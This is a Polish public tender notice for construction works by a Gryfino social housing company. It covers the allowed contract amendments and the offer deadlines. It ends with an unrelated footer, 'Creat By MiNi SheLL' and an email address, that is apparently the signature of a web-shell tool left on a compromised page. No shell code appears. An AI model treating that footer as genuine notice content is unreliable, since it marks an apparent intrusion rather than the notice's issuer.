<p>Zamawiający dopuszcza następujące zmiany umowy oraz warunki dokonania takiej zmiany:
a) Zmiana personelu kluczowego Wykonawcy :
   - Na pisemny wniosek Wykonawcy dopuszczalna jest zamiana personelu  
     kluczowego  Wykonawcy ;   wniosek winien wskazywać zakres zmiany oraz 
      zawierać dokumenty   potwierdzające spełnienie warunków udziału w 
     postępowaniu odnoszące się do członka personelu kluczowego, którego 
     dotyczy zmiana ; zmiana dopuszczalna jest wyłącznie  za zgodą Inwestora.
b) Zamiana terminu realizacji przedmiotu umowy :
    W uzasadnionych przypadkach, za zgodą Inwestora dopuszcza się zmianę   
    terminu realizacji przedmiotu zamówienia ; wydłużenie okresu realizacji 
   przedmiotu zamówienia jest dopuszczalne o ile zachodzi co najmniej jedna z 
   poniższych  przesłanek:
          1)  w przypadku nieodpowiednich warunków atmosferycznych, w celu 
               dotrzymania wymogów technologicznych Inwestora dopuszcza 
               przesunięcie terminu  wykonania robót.
	 Przesunięcie ww. terminu  Inwestor warunkuje złożeniem przez 
              Wykonawcę stosownego wniosku oraz dokumentów wskazujących, że 
              zachowanie wymogów technologicznych w danych  warunkach 
              atmosferycznych jest niemożliwe (informacja o stanie pogody z Biura 
              Prognoz) W przypadku nieodpowiednich warunków atmosferycznych , w 
              celu dotrzymania wymogów technologicznych  Zamawiający dopuszcza 
              przesunięcie terminu wykonania robót;
          2) nastąpiło wstrzymanie wykonania prac na okres nie krótszy niż 28 dni z  
              innych  przyczyn niezależnych od Wykonawcy. 
          3) nastąpiła konieczność wykonania prac dodatkowych których nie można 
              było wcześniej przewidzieć i nie wynikają  one z opisu przedmiotu 
              zamówienia, a wykonanie tych prac ma wpływ na termin wykonania 
              robót wskazanych w opisie przedmiotu zamówienia. 
         4)  na wniosek Wykonawcy termin realizacji przedmiotu zamówienia może 
              zostać  skrócony. 
      Wykonawcy z tytułu zmiany terminu wykonania przedmiotu zamówienia nie 
      będzie  przysługiwało dodatkowe wynagrodzenie, w tym wynagrodzenie za 
       czas przestoju.
 c) Zmiana wartości umowy :
           1)  W przypadku urzędowej zmiany podatków lub    opłat   wynagrodzenie 
                umowne ulega odpowiedniej  zmianie ; zmiana wartości zostanie 
                dokonana   zgodnie ze  znowelizowanym stanem prawnym. 
           2)  W  przypadku zwiększenia lub zmniejszenia ilości dwustronnie  
                uzgodnionych robót   wynikających :
                   -  ze  zmiany technologii wykonania ,   zastrzeżeniem iż   zmiana 
                     taka nie może przekroczyć 20% wartości  wynagrodzenia umownego
                  -   różnicy między  przedmiarem robót wykazanej z koncepcji 
                      programowo- przestrzennej a projektem budowlanym a 
                      wynikających z różnicy w powierzchni użytkowej poszczególnych 
                      elementów składowych budynku ; różnica w wysokości 2% nie 
                       wpłynie na zmianę wartości umowy 
     d) Zmiany technologii wykonania elementów robót :
         1)  Na wniosek Wykonawcy, za zgodą Zamawiającego,    w trakcie 
            prowadzenia inwestycji, mogą być    dokonywane zmiany technologii 
            wykonania elementów robót ; dopuszcza się je tylko w    przypadku gdy 
            proponowane przez niego    rozwiązanie jest równorzędne lub lepsze   
            funkcjonalnie od tego jakie przewiduje projekt ; tym przypadku 
            Wykonawca przedstawi  projekt zamienny zawierający opis 
             proponowanych zmian  wraz z rysunkami. 
             Projekt  taki wymaga akceptacji  nadzoru autorskiego i zatwierdzenia do 
             realizacji przez Zamawiającego. 
        2)  W przypadku gdy z punktu widzenia  Zmawiającego  zachodzi potrzeba 
             zmiany  rozwiązań technicznych  nie przewidzianych w    umowie,  
             Zamawiający  sporządza protokół  konieczności, a następnie dostarcza  
              dokumentację    projektową na te roboty wraz ze zleceniem ich   
              wykonania. 
     3)    W przypadku gdy określone w p. 2 zmiany powodują wzrost kosztów  
            inwestycji  traktuje się je    jako roboty dodatkowe i  Zamawiający musi 
            udzielić zamówienia dodatkowego ich wykonanie, w  trybie wynikającym z 
            art.67 ust 1 pkt. 5 ustawy  pzp.
      e) Zmiana kolejności wykonania elementów robót :
          Na pisemny wniosek oraz za zgodą Zamawiającego dopuszcza się zmianę 
          kolejności wykonania elementów robót. Wniosek o zmianę kolejności  
         wykonania robót musi zawierać propozycję zmiany harmonogramu 
          wykonywania elementów robót.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.tbs.gryfino.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gryfińskie Towarzystwo Budownictwa Społecznego Spółka z o.o.
        ul. Grunwaldzka 1 , 74-100 Gryfino.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.03.2011 godzina 11:00, miejsce: Gryfińskie Towarzystwo Budownictwa Społecznego Spółka z o.o.
        ul. Grunwaldzka 1 , 74-100 Gryfino ,
      pokój nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com